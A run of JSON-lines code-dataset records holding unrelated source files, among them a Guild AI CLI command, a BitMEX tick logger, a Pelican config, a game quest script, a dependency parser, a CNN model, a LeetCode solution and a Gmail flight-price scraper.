1:\n curr += c\n in_paren += 1\n \n # do stuff\n elif c == ')':\n in_paren -= 1\n if in_paren >= 1:\n curr += c\n if in_paren == 0:\n expr.append(resolve(curr))\n curr = ''\n else:\n if in_paren > 0:\n curr += c\n else:\n if c == '*' or c == '+':\n expr.append(c)\n else:\n expr.append(int(c))\n return eval(expr)\n\ntot = 0\nfor l in lines:\n tot += resolve(l)\nprint(tot)\n \n \n# 10 participants, kev 1 on 10 days, ryd 2 on 10 days\n# kev = 10*2*10 = 200\n# ryd = 9*2*10 = 180\n# reduce to 2 participants\n# kev = 2*2*10 = 40\n# ryd = 1*2*10 = 20\n \n \n \n \n \n \n \n \n \n \n \n # hello","sub_path":"2020/day18/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"79269602","text":"# Copyright 2017-2019 TensorHub, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nimport click\n\nfrom guild import click_util\n\nfrom . import remote_support\nfrom . 
import runs_support\n\ndef label_params(fn):\n click_util.append_params(fn, [\n runs_support.runs_arg,\n click.Argument((\"label\",), required=False),\n runs_support.op_and_label_filters,\n runs_support.status_filters,\n click.Option(\n (\"-c\", \"--clear\"),\n help=\"Clear the run's label.\",\n is_flag=True),\n remote_support.remote_option(\"Label remote runs.\"),\n click.Option(\n (\"-y\", \"--yes\"),\n help=\"Do not prompt before modifying labels.\",\n is_flag=True),\n ])\n return fn\n\n@click.command(\"label\")\n@label_params\n\n@click.pass_context\n@click_util.use_args\n@click_util.render_doc\n\ndef label_runs(ctx, args):\n \"\"\"Set run labels.\n\n If `LABEL` is provided, the command will label the selected\n runs. To clear a run label, use the ``--clear`` option.\n\n Specify runs to modify using one or more `RUN` arguments. See\n SPECIFYING RUNS for more information.\n\n If `RUN` isn't specified, the most recent run is selected.\n\n By default Guild will prompt you before making any changes. If you\n want to apply the changes without being prompted, use the\n ``--yes`` option.\n\n {{ runs_support.runs_arg }}\n\n If a `RUN` argument is not specified, ``0`` is assumed (the most\n recent run).\n\n {{ runs_support.op_and_label_filters }}\n\n {{ runs_support.status_filters }}\n\n ### Labeling remote runs\n\n To label remote runs, use `--remote`.\n\n {{ remote_support.remote_option }}\n\n \"\"\"\n from . import runs_impl\n runs_impl.label(args, ctx)\n","sub_path":"guild/commands/runs_label.py","file_name":"runs_label.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"20163229","text":"import configparser\nimport datetime\nimport time\n\nfrom bitmex_websocket import BitMEXWebsocket\nfrom pymongo import MongoClient\n\nclass tickWriter:\n ws = BitMEXWebsocket(endpoint=\"wss://www.bitmex.com/realtime\", symbol=\"XBTUSD\",\n api_key=None, api_secret=None)\n ws.get_instrument()\n\n def __init__(self):\n config = configparser.ConfigParser()\n config.read('config.ini')\n address = config['MONGODB']['LocalAddress']\n portString = config['MONGODB']['LocalPort']\n port = int(portString)\n dbName = config['MONGODB']['DB']\n collName = config['MONGODB']['Collection']\n self.client = MongoClient(address, port)\n self.db = self.client[dbName]\n self.collection = self.db[collName]\n\n def postProcess(self):\n tickDict = self.ws.recent_trades()\n now = datetime.datetime.now()\n print(now.strftime('%Y-%m%d %H:%M:%S'), \"Connection Error Occured\")\n self.ws.get_instrument()\n time.sleep(0.1)\n editedDict = []\n for tickList in tickDict:\n tempList = tickList\n if (len(list(tempList.keys())) > 5):\n del tempList['symbol']\n del tempList['tickDirection']\n del tempList['trdMatchID']\n del tempList['grossValue']\n del tempList['homeNotional']\n del tempList['foreignNotional']\n tempList['timestamp'] = tempList['timestamp'].replace(\"T\", \" \").replace(\"Z\", \"\")\n editedDict.append(tempList)\n\n return editedDict\n\n\n def tickWriter(self):\n tempList = self.postProcess()\n if(tempList.__len__() > 0):\n\n post_id = self.collection.insert_many(tempList).inserted_ids\n post_id\n\n for temp in tempList:\n print(temp)\n\n\n\n","sub_path":"tickWriter.py","file_name":"tickWriter.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"51250139","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\n\nAUTHOR = 'Alexandre 
Vicenzi'\nSITEURL = 'http://localhost:8000'\nSITENAME = \"Alexandre Vicenzi's Blog\"\nSITETITLE = AUTHOR\nSITESUBTITLE = 'Software Engineer - Maker'\nSITEDESCRIPTION = '%s\\'s Thoughts and Writings' % AUTHOR\nSITELOGO = '//s.gravatar.com/avatar/5dc5ba59a94eeab2106ad9d397361b2c?s=120'\nFAVICON = '/images/favicon.ico'\nBROWSER_COLOR = '#333333'\nPYGMENTS_STYLE = 'monokai'\n\nROBOTS = 'index, follow'\n\nTHEME = '../flex'\nPATH = 'content'\nTIMEZONE = 'America/New_York'\nDEFAULT_LANG = 'en'\nOG_LOCALE = 'en_US'\nLOCALE = 'en_US'\n\nDATE_FORMATS = {\n    'en': '%B %d, %Y',\n}\n\nFEED_ALL_ATOM = 'feeds/all.atom.xml'\nCATEGORY_FEED_ATOM = 'feeds/%s.atom.xml'\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\nUSE_FOLDER_AS_CATEGORY = False\nMAIN_MENU = True\n\nLINKS = (('Portfolio', 'http://alexandrevicenzi.com'),)\n\nSOCIAL = (('linkedin', 'https://br.linkedin.com/in/alexandrevicenzi/en'),\n          ('github', 'https://github.com/alexandrevicenzi'),\n          ('google', 'https://google.com/+AlexandreVicenzi'),\n          ('twitter', 'https://twitter.com/alxvicenzi'),\n          ('rss', '//blog.alexandrevicenzi.com/feeds/all.atom.xml'))\n\nMENUITEMS = (('Archives', '/archives.html'),\n             ('Categories', '/categories.html'),\n             ('Tags', '/tags.html'),)\n\nCC_LICENSE = {\n    'name': 'Creative Commons Attribution-ShareAlike',\n    'version': '4.0',\n    'slug': 'by-sa'\n}\n\nCOPYRIGHT_YEAR = 2016\n\nDEFAULT_PAGINATION = 10\n\nPLUGIN_PATHS = ['./pelican-plugins']\nPLUGINS = ['sitemap', 'post_stats']\n\nSITEMAP = {\n    'format': 'xml',\n    'priorities': {\n        'articles': 0.6,\n        'indexes': 0.6,\n        'pages': 0.5,\n    },\n    'changefreqs': {\n        'articles': 'monthly',\n        'indexes': 'daily',\n        'pages': 'monthly',\n    }\n}\n\nDISQUS_SITENAME = \"alexandrevicenziblog\"\nADD_THIS_ID = 'ra-55adbb025d4f7e55'\n\nSTATUSCAKE = {\n    'trackid': 'SL0UAgrsYP',\n    'days': 7,\n    'rumid': 6852,\n    'design': 6,\n}\n\nSTATIC_PATHS = ['images', 'extra']\n\nEXTRA_PATH_METADATA = {\n    'extra/custom.css': {'path': 'static/custom.css'},\n}\n\nCUSTOM_CSS = 'static/custom.css'\n\nUSE_LESS = True\n","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"237602750","text":"# Made by disKret\nimport sys\nfrom net.sf.l2j.gameserver.model.quest import State\nfrom net.sf.l2j.gameserver.model.quest import QuestState\nfrom net.sf.l2j.gameserver.model.quest.jython import QuestJython as JQuest\n\n#NPC\nLARA = 7063\nBRIGHT = 7466\nEMILY = 7620\n\n#MOBS\nWASP_WORKER = 934\nWASP_LEADER = 935\n\n#ITEMS\nFRUIT_BASKET = 7136\nAVELLAN_SPICE = 7137\nHONEY_POUCH = 7138\n\n#REWARDS\nADENA = 57\nVARNISH = 1865\n\nclass Quest (JQuest) :\n\n    def __init__(self,id,name,descr):\n        JQuest.__init__(self,id,name,descr)\n        self.questItemIds = [HONEY_POUCH, AVELLAN_SPICE, FRUIT_BASKET]\n\n    def onEvent (self,event,st) :\n        htmltext = event\n        cond = st.getInt(\"cond\")\n        if event == \"7620-1.htm\" :\n            st.set(\"cond\",\"1\")\n            st.setState(STARTED)\n            st.playSound(\"ItemSound.quest_accept\")\n        elif event == \"7620-3.htm\" and st.getQuestItemsCount(HONEY_POUCH)==100:\n            st.takeItems(HONEY_POUCH,100)\n            st.set(\"cond\",\"3\")\n        elif event == \"7063-1.htm\" and cond == 3:\n            st.giveItems(AVELLAN_SPICE,1)\n            st.set(\"cond\",\"4\")\n        elif event == \"7620-5.htm\" and st.getQuestItemsCount(AVELLAN_SPICE):\n            st.takeItems(AVELLAN_SPICE,1)\n            st.set(\"cond\",\"5\")\n        elif event == \"7466-1.htm\" and cond == 5:\n            st.giveItems(FRUIT_BASKET,1)\n            st.set(\"cond\",\"6\")\n        elif 
event == \"7620-7.htm\" and st.getQuestItemsCount(FRUIT_BASKET):\n st.takeItems(FRUIT_BASKET,1)\n st.giveItems(ADENA,25000)\n st.giveItems(VARNISH,50)\n st.unset(\"cond\")\n st.playSound(\"ItemSound.quest_finish\")\n st.exitQuest(1)\n return htmltext\n\n def onTalk (Self,npc,st):\n htmltext = \"I have nothing to say to you.\"\n npcId = npc.getNpcId()\n id = st.getState()\n cond = st.getInt(\"cond\")\n if npcId == EMILY and cond == 0 :\n if st.getPlayer().getLevel() >= 34 and st.getPlayer().getLevel() <= 40 :\n htmltext = \"7620-0.htm\"\n else:\n htmltext = \"7620-0a.htm\"\n st.exitQuest(1)\n elif npcId == EMILY and st.getQuestItemsCount(HONEY_POUCH) == 100 :\n htmltext = \"7620-2.htm\"\n elif npcId == LARA and cond == 3 :\n htmltext = \"7063-0.htm\"\n elif npcId == EMILY and st.getQuestItemsCount(AVELLAN_SPICE) == 1 :\n htmltext = \"7620-4.htm\"\n elif npcId == BRIGHT and cond == 5 :\n htmltext = \"7466-0.htm\"\n elif npcId == EMILY and st.getQuestItemsCount(FRUIT_BASKET) == 1 :\n htmltext = \"7620-6.htm\"\n return htmltext\n\n def onKill (self,npc,player,isPet):\n st = player.getQuestState(\"299_GatherIngredientsForPie\")\n if st :\n if st.getState() != STARTED : return\n npcId = npc.getNpcId()\n count = st.getQuestItemsCount(HONEY_POUCH)\n if st.getInt(\"cond\") == 1 and count < 100 :\n st.giveItems(HONEY_POUCH,1)\n if count == 99 :\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"2\")\n else :\n st.playSound(\"ItemSound.quest_itemget\")\t\n return\n\nQUEST = Quest(299,\"299_GatherIngredientsForPie\",\"Gather Ingredients For A Pie\")\nCREATED = State('Start', QUEST)\nSTARTED = State('Started', QUEST)\n\nQUEST.setInitialState(CREATED)\nQUEST.addStartNpc(7620)\nQUEST.addTalkId(7620)\nQUEST.addTalkId(7063)\nQUEST.addTalkId(7466)\nQUEST.addKillId(WASP_LEADER)\nQUEST.addKillId(WASP_WORKER)","sub_path":"DataPack/data/scripts/quests/299_GatherIngredientsForPie/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"409011869","text":"from prepare_feature import Feature\nimport model\nimport numpy as np\nimport torch\nfrom const import Config\n\nconfig=Config()\nfeature=Feature(config)\n\n\nclass Parser(object):\n def __init__(self,sentence):\n self.sentence=sentence # [1, 2, 3, 4, 5, 6, 7]\n self.stack=[\"\"]\n self.buffer=list(sentence)\n self.dep=[]\n\n def parse_step(self,transition):\n if transition==\"S\" and len(self.buffer)>0:\n word=self.buffer.pop(0)\n self.stack.append(word)\n if transition==\"L\":\n head=self.stack[-1]\n dependent=self.stack.pop(-2)\n self.dep.append((head,dependent))\n if transition=='R':\n head=self.stack[-2]\n dependent=self.stack.pop()\n self.dep.append((head,dependent))\n\n def parse(self,transitions):\n for transition in transitions:\n self.parse_step(transition)\n return self.dep\n\n\nclass Decoding(object):\n def __init__(self,dataset,sentence2id,model,device): # 保存全部dev集/test集的数据\n self.dataset=dataset # dataset: [{\"word\":[], \"pos\":[], \"head\":[], \"label\":[]}, {}, ...]\n self.sentence2id=sentence2id # {\"2356764564\":0, \"2348654355\":1 , ...}\n self.model=model\n self.device=device\n\n def predict(self,parsers):\n '''\n w_input=[]\n p_input=[]\n l_input=[]\n for p in parsers:\n word_features, pos_features, label_features=feature.create_features(p.stack, p.buffer, p.dep, self.dataset[self.sentence2id[id(p.sentence)]])\n w_input.append(word_features)\n p_input.append(pos_features)\n 
l_input.append(label_features)\n '''\n\n\n x=[feature.create_features(p.stack,p.buffer,p.dep,self.dataset[self.sentence2id[id(p.sentence)]]) for p in parsers]\n x=np.array(x).astype('int32') # 二维int32数组,大小为:数据量(最大是batch_size)*48\n x=torch.from_numpy(x).long().to(self.device)\n\n '''\n w_input=np.array(w_input).astype('int32')\n p_input = np.array(p_input).astype('int32')\n l_input = np.array(l_input).astype('int32')\n w_input=torch.from_numpy(w_input).long().to(self.device)\n p_input=torch.from_numpy(p_input).long().to(self.device)\n l_input = torch.from_numpy(l_input).long().to(self.device)\n '''\n\n l=[feature.legal_labels(p.stack, p.buffer) for p in parsers]\n predict_logits=self.model(x)\n predict_logits=predict_logits.detach().numpy()\n #predict=np.argmax(predict_logits,1)\n predict = np.argmax(predict_logits+ 10000 * np.array(l).astype('float32'), 1)\n predict=[\"S\" if p==2 else (\"L\" if p==0 else \"R\") for p in predict]\n return predict\n\n def batch_parse(self,sentences,batch_size): # sentences: [[1,2,3,...], [1,2,3,4,...], ...]\n num_sentence=len(sentences)\n all_parsers=[Parser(sentence) for sentence in sentences]\n need_parse=all_parsers[:]\n dependent=[]\n while len(need_parse)>0:\n # 一个句子一个parser,用self.predict()函数对所有句子获取它们的预测状态列表,\n # 每个句子的预测状态列表用来在下面的for循环中不断更新这个句子的parse,直到模拟结束r\n # while循环每进行一轮,数据集中的所有句子的parser更新一次状态,即获得一次预测输出\n # for循环每进行一轮,一个句子更新一次状态,并判断这个句子是否应该结束它的栈状态的更新\n # 随着更新的不断进行,每个句子的依存结果保存在它们自己的parser对象的dep属性中,while循环结束后统一获取\n parsers=need_parse[:batch_size] # list [parser, parser, ...], 长度为句子数\n predict_transitions=self.predict(parsers) # list ['S', 'S', ...], 长度为句子数\n for p,transition in zip(parsers,predict_transitions):\n p.parse([transition]) # parse函数:模拟栈状态,对此时Parser保存的stack\\buffer等按transition的三种结果执行\n if len(p.buffer)==0 and len(p.stack)==1:\n need_parse.remove(p)\n\n dependent=[p.dep for p in all_parsers]\n return dependent\n\n","sub_path":"语言与认知/实验一/Parsing.py","file_name":"Parsing.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"105581936","text":"import numpy as np\nimport tensorflow as tf\n\n\ndef cnn(X_input, n_output, is_training, dropout_rate=0.3):\n # inputs, outputs size, kernel_size만 넣어주면\n # activation function 및 Conv 에 필요한 수치들은 알아서 계산해줌\n L1 = tf.layers.conv2d(inputs=X_input, filters=32, kernel_size=[3, 3], \n activation=tf.nn.relu, padding='same')\n L1 = tf.layers.max_pooling2d(inputs=L1, pool_size=[2, 2], strides=[2, 2], padding='valid')\n L1 = tf.layers.dropout(inputs=L1, rate=dropout_rate, training=is_training)\n\n L2 = tf.layers.conv2d(L1, 64, [3, 3], activation=tf.nn.relu, padding='same')\n L2 = tf.layers.max_pooling2d(L2, [2, 2], [2, 2], padding='valid')\n L2 = tf.layers.dropout(L2, dropout_rate, is_training)\n\n L3 = tf.layers.conv2d(L2, 128, [3, 3], activation=tf.nn.relu, padding='same')\n L3 = tf.layers.max_pooling2d(L3, [2, 2], [2, 2], padding='valid')\n L3 = tf.layers.dropout(L3, dropout_rate, is_training)\n\n L4 = tf.layers.flatten(L3) # FC\n L4 = tf.layers.dense(L4, 256, activation=tf.nn.relu)\n L4 = tf.layers.dropout(L4, dropout_rate, is_training)\n\n model = tf.layers.dense(L4, n_output, activation=None, name='model')\n\n return model","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"654175589","text":"#!/usr/local/bin/python3\n# -*- coding:utf-8 -*-\n\"\"\"\n@author: \n@file: 
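The `cnn` function in model.py above is written against the TF1-era `tf.layers` API (the Korean comments note that `tf.layers.conv2d` creates the weights and applies the activation internally). One caveat: `tf.layers.dropout(L2, dropout_rate, is_training)` passes `is_training` positionally into the `noise_shape` slot rather than `training=`, which looks like a bug. For comparison, a rough equivalent in `tf.keras` — a sketch assuming TensorFlow 2.x, with layer widths mirroring the original:

```python
import tensorflow as tf

def build_cnn(n_output, dropout_rate=0.3):
    """Three conv/pool/dropout blocks followed by a dense head (logits out)."""
    return tf.keras.Sequential([
        tf.keras.layers.Conv2D(32, (3, 3), activation="relu", padding="same"),
        tf.keras.layers.MaxPooling2D((2, 2)),
        tf.keras.layers.Dropout(dropout_rate),
        tf.keras.layers.Conv2D(64, (3, 3), activation="relu", padding="same"),
        tf.keras.layers.MaxPooling2D((2, 2)),
        tf.keras.layers.Dropout(dropout_rate),
        tf.keras.layers.Conv2D(128, (3, 3), activation="relu", padding="same"),
        tf.keras.layers.MaxPooling2D((2, 2)),
        tf.keras.layers.Dropout(dropout_rate),
        tf.keras.layers.Flatten(),
        tf.keras.layers.Dense(256, activation="relu"),
        tf.keras.layers.Dropout(dropout_rate),
        tf.keras.layers.Dense(n_output),  # no activation: raw logits
    ])
```

Here Keras handles the training/inference switch for dropout automatically via the `training` argument to `model(x, training=...)`.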
983.最低票价.py\n@time: 2020/5/6 09:54\n@desc: \n\"\"\"\n\"\"\"\n在一个火车旅行很受欢迎的国度,你提前一年计划了一些火车旅行。在接下来的一年里,你要旅行的日子将以一个名为 days 的数组给出。每一项是一个从 1 到 365 的整数。\n火车票有三种不同的销售方式:\n一张为期一天的通行证售价为 costs[0] 美元;\n一张为期七天的通行证售价为 costs[1] 美元;\n一张为期三十天的通行证售价为 costs[2] 美元。\n通行证允许数天无限制的旅行。 例如,如果我们在第 2 天获得一张为期 7 天的通行证,那么我们可以连着旅行 7 天:第 2 天、第 3 天、第 4 天、第 5 天、第 6 天、第 7 天和第 8 天。\n返回你想要完成在给定的列表 days 中列出的每一天的旅行所需要的最低消费。\n\n示例 1:\n\n输入:days = [1,4,6,7,8,20], costs = [2,7,15]\n输出:11\n解释: \n例如,这里有一种购买通行证的方法,可以让你完成你的旅行计划:\n在第 1 天,你花了 costs[0] = $2 买了一张为期 1 天的通行证,它将在第 1 天生效。\n在第 3 天,你花了 costs[1] = $7 买了一张为期 7 天的通行证,它将在第 3, 4, ..., 9 天生效。\n在第 20 天,你花了 costs[0] = $2 买了一张为期 1 天的通行证,它将在第 20 天生效。\n你总共花了 $11,并完成了你计划的每一天旅行。\n示例 2:\n\n输入:days = [1,2,3,4,5,6,7,8,9,10,30,31], costs = [2,7,15]\n输出:17\n解释:\n例如,这里有一种购买通行证的方法,可以让你完成你的旅行计划: \n在第 1 天,你花了 costs[2] = $15 买了一张为期 30 天的通行证,它将在第 1, 2, ..., 30 天生效。\n在第 31 天,你花了 costs[0] = $2 买了一张为期 1 天的通行证,它将在第 31 天生效。 \n你总共花了 $17,并完成了你计划的每一天旅行。\n \n\n提示:\n\n1 <= days.length <= 365\n1 <= days[i] <= 365\ndays 按顺序严格递增\ncosts.length == 3\n1 <= costs[i] <= 1000\n\"\"\"\nfrom typing import List\n\nclass Solution:\n def mincostTickets(self, days: List[int], costs: List[int]) -> int:\n # 创建初始列表\n dp = [0] * (days[-1]+1)\n # days的索引\n next_day = 0\n # 遍历dp为了更新dp值\n for i in range(len(dp)):\n # 当前天数不是days里面的天数 说明不用出行最小花费等于昨天即可\n if i != days[next_day]:\n dp[i] = dp[i-1]\n else:\n # 获取min(一天前 7天前 30天前 + 各自对应的花销)\n dp[i] = min(dp[max(0, i-1)]+costs[0], dp[max(0, i-7)]+costs[1], dp[max(0, i-30)]+costs[2])\n # days索引加1\n next_day += 1\n return dp[-1]\n\n\na = Solution().mincostTickets([1,4,6,7,8,20], [2,7,15])\nprint(a)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"A daily topic/2020/may/200506__983.最低票价.py","file_name":"200506__983.最低票价.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"188393763","text":"print (\"Welcome to roller coaster!\")\nheight = int(input(\"What is your height in cm?\"))\nbill = 0\nif height >= 120 :\n age = int(input(\"What is your age?\"))\n if age < 12:\n bill = 5\n print(\"Child ticket price is $5.\")\n elif age <= 18:\n bill = 7\n print(\"Youth ticket price is $7.\")\n elif age > 18 and age< 45:\n bill = 12\n print(\"Adult ticket price is $12.\")\n elif age>= 45 and age <= 55:\n print(\"Your ride is free. But You should pay for photo.\")\n want_photo = input(\"Do you want a photo taken? Y or N. \")\n if want_photo == \"Y\":\n bill += 3\n print(f\"Your ticket price is ${bill}\")\nelse:\n print(\"Sorry! You can't ride roller coaster.\")","sub_path":"Day 3/Ticket for photo.py","file_name":"Ticket for photo.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"316950058","text":"#!/usr/bin/env python\n\nimport os\nimport nose\nimport sys\n\nsys.path.append(\"\")\n\n# setup cassandra\nfrom cqlengine import connection\n\ntry:\n CASSANDRA_VERSION = int(os.environ[\"CASSANDRA_VERSION\"])\nexcept:\n print(\"CASSANDRA_VERSION must be set as an environment variable. 
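The solution above fills `dp` day by day: on non-travel days the cost carries over from yesterday; on travel days it takes the cheapest of extending a 1-, 7-, or 30-day pass, i.e. `dp[i] = min(dp[i-1]+costs[0], dp[i-7]+costs[1], dp[i-30]+costs[2])`. A standalone version with both worked examples from the problem statement as checks (a sketch mirroring the logic above):

```python
def min_cost_tickets(days, costs):
    """dp[i] = cheapest total cost to cover all travel days up to day i."""
    travel = set(days)
    dp = [0] * (days[-1] + 1)
    for i in range(1, len(dp)):
        if i not in travel:
            dp[i] = dp[i - 1]  # no travel today: cost carries over
        else:
            dp[i] = min(dp[max(0, i - 1)] + costs[0],
                        dp[max(0, i - 7)] + costs[1],
                        dp[max(0, i - 30)] + costs[2])
    return dp[-1]

assert min_cost_tickets([1, 4, 6, 7, 8, 20], [2, 7, 15]) == 11
assert min_cost_tickets([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 30, 31], [2, 7, 15]) == 17
```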
One of (12, 20, 21)\")\n raise\n\nif os.environ.get('CASSANDRA_TEST_HOST'):\n CASSANDRA_TEST_HOST = os.environ['CASSANDRA_TEST_HOST']\nelse:\n CASSANDRA_TEST_HOST = 'localhost'\n\nif CASSANDRA_VERSION < 20:\n protocol_version = 1\nelse:\n protocol_version = 2\n\nconnection.setup([CASSANDRA_TEST_HOST], protocol_version=protocol_version, default_keyspace='cqlengine_test')\n\nnose.main()\n","sub_path":"bin/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"521441019","text":"'''\r\nhttps://github.com/abhishekchhibber/Gmail-Api-through-Python\r\n'''\r\n\r\n\r\nfrom googleapiclient.discovery import build\r\nfrom httplib2 import Http\r\nfrom oauth2client import file, client, tools\r\nimport datefinder\r\nimport re\r\nimport pandas as pd\r\nimport numpy as np\r\nimport xlrd\r\nimport openpyxl\r\nimport datetime\r\nfrom datetime import datetime as dt\r\n\r\nimport base64\r\nimport email\r\nfrom googleapiclient import errors\r\n\r\n\r\nargs = tools.argparser.parse_args()\r\nargs.noauth_local_webserver = True\r\n\r\nSCOPES = 'https://www.googleapis.com/auth/gmail.readonly'\r\nstore = file.Storage('credentials.json')\r\ncreds = store.get()\r\n\r\nif not creds or creds.invalid:\r\n flow = client.flow_from_clientsecrets('C:\\\\Users\\\\huong.vu\\\\Desktop\\\\Git\\\\Google-Flights-Prices\\\\client_secret.json',\r\n SCOPES)\r\n creds = tools.run_flow(flow, store, args)\r\n\r\nservice = build('gmail', 'v1', http=creds.authorize(Http()))\r\n\r\n# calll the Gmail API, only get 1 of the recent message ids\r\n# First get the message if for the message\r\nresults = service.users().messages().list(userId='me',\r\n maxResults=100, # max record to obtain\r\n q='from: noreply-travel@google.com label:inbox ').execute() # include filter for message\r\n\r\ntime = []\r\nprice_now = []\r\nprice_before = []\r\nairlines = []\r\n\r\ndollar = re.compile(r'\\$\\d+\\,*\\d+')\r\neva = re.compile(r'EVA')\r\n\r\nfor i in range(results['resultSizeEstimate']):\r\n # get the message id from the results object\r\n message_id = results['messages'][i]['id']\r\n\r\n # use the message id to get the actual message, including any attachments\r\n message = service.users().messages().get(userId='me', id=message_id).execute()\r\n # print(message['snippet'])\r\n # for dic in message['payload']['headers']:\r\n # if dic['name'] == 'Subject':\r\n # print(dic['value'])\r\n ''' \r\n we know the structure of a message variable and the information we need is from ['snippet']\r\n and ['payload']['headers'], so we can directly go there without a loop.\r\n Subject and Date are under ['payload']['headers']; however, the object is a list of dictionaries,\r\n so we cant reference by name. So, we have to use a loop to go through.\r\n '''\r\n\r\n '''\r\n If the snippet contains:\r\n 1. 'your tracked flight' with 'EVA Air' => airline = EVA Air\r\n 2. 'your tracked flight' without 'EVA Air' => airline = EVA Air cooperated\r\n 3. 'your tracked flights' => EVA Air and EVA Air cooperated\r\n 4. 
no 'your track flight(s)' => specify in snippet\r\n '''\r\n # prices = [p for p in dollar.finditer(message['snippet'])]\r\n for dic in message['payload']['headers']:\r\n if dic['name'] == 'Subject':\r\n prices = [p.group() for p in dollar.finditer(dic['value'])]\r\n if prices:\r\n price_now.append(prices[0])\r\n price_before.append(prices[1])\r\n else:\r\n prices = [p.group() for p in re.finditer(dollar, message['snippet'])]\r\n price_now.append(prices[0])\r\n price_before.append(prices[1])\r\n if dic['name'] == 'Date':\r\n date = dt.strptime(dic['value'], '%a, %d %b %Y %H:%M:%S %z').strftime('%m/%d/%y')\r\n time.append(date)\r\n\r\n snippet = message['snippet']\r\n if re.search('tracked flights', snippet):\r\n airlines.append('EVA Air & cooeperated')\r\n elif re.search('tracked flight',snippet) and re.search('EVA Air',snippet):\r\n airlines.append('EVA Air')\r\n elif re.search(r'tracked flight[^s]*', snippet):\r\n airlines.append('EVA cooperated')\r\n else:\r\n prices = [p.end() for p in re.finditer(dollar, snippet)]\r\n spaces = [s.end() for s in re.finditer('\\s', snippet[prices[1]:])]\r\n airlines.append(snippet[prices[1]:(prices[1] + spaces[2])].strip())\r\n if snippet[prices[1]:(prices[1] + spaces[2])].strip() == 'your tracked':\r\n print(message_id)\r\n\r\n\r\n\r\n# reorder data\r\ntime.reverse()\r\nprice_before.reverse()\r\nprice_now.reverse()\r\nairlines.reverse()\r\n\r\n# bring result into data frame\r\ndata = pd.DataFrame(data={'time': time,\r\n 'price_now': price_now,\r\n 'price_before': price_before,\r\n 'airline': airlines})\r\n\r\n# open excel\r\nworkbook = openpyxl.load_workbook('C:\\\\Users\\\\huong.vu\\\\Desktop\\\\Git\\\\Google-Flights-Prices\\\\gmail_flight.xlsx')\r\n# getting sheet in excel\r\nsheet = workbook['Sheet1']\r\n# getting last row in excel sheet\r\nlast_row = sheet.max_row\r\n\r\n# getting historical data\r\nhist_data = pd.DataFrame(data={'time': [sheet.cell(row=d, column=1).value for d in range(2, last_row + 1)],\r\n 'price_now': [sheet.cell(row=d, column=2).value for d in range(2, last_row + 1)],\r\n 'price_before': [sheet.cell(row=d, column=3).value for d in range(2, last_row + 1)],\r\n 'airline': [sheet.cell(row=d, column=4).value for d in range(2, last_row + 1)]})\r\n\r\n# remove duplicates\r\ninsert_data = data.join(hist_data, lsuffix='_new', rsuffix='_hist')\r\ninsert_data = insert_data[pd.isnull(insert_data['time_hist'])].iloc[:, 0:4]\r\n\r\n# write data into excel file\r\nfor k in range(last_row + 1, len(insert_data) + last_row + 1):\r\n try:\r\n sheet.cell(row=k, column=1).value = insert_data['time_new'].iloc[k - last_row - 1]\r\n sheet.cell(row=k, column=2).value = insert_data['price_now_new'].iloc[k - last_row - 1]\r\n sheet.cell(row=k, column=3).value = insert_data['price_before_new'].iloc[k - last_row - 1]\r\n sheet.cell(row=k, column=4).value = insert_data['airline_new'].iloc[k - last_row - 1]\r\n except Exception as e:\r\n print(str(e))\r\n\r\nworkbook.save('C:\\\\Users\\\\huong.vu\\\\Desktop\\\\Git\\\\Google-Flights-Prices\\\\gmail_flight.xlsx')\r\nworkbook.close()\r\n","sub_path":"gmailcode.py","file_name":"gmailcode.py","file_ext":"py","file_size_in_byte":5893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"446638789","text":"from tests.utils import random_string\nfrom tests.functional.header import Header\nfrom tests.functional.user.auth.utils import create_user, sign_in\nfrom tests.functional.bases.base_without_create_project_author import 
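gmailcode.py above hinges on two small parsing steps: a dollar-amount regex and `strptime` for RFC-2822 email dates. Isolated for clarity — the pattern is the one used above; note that `\$\d+\,*\d+` requires at least two digits, so a bare `$5` would not match:

```python
import re
from datetime import datetime

dollar = re.compile(r"\$\d+\,*\d+")
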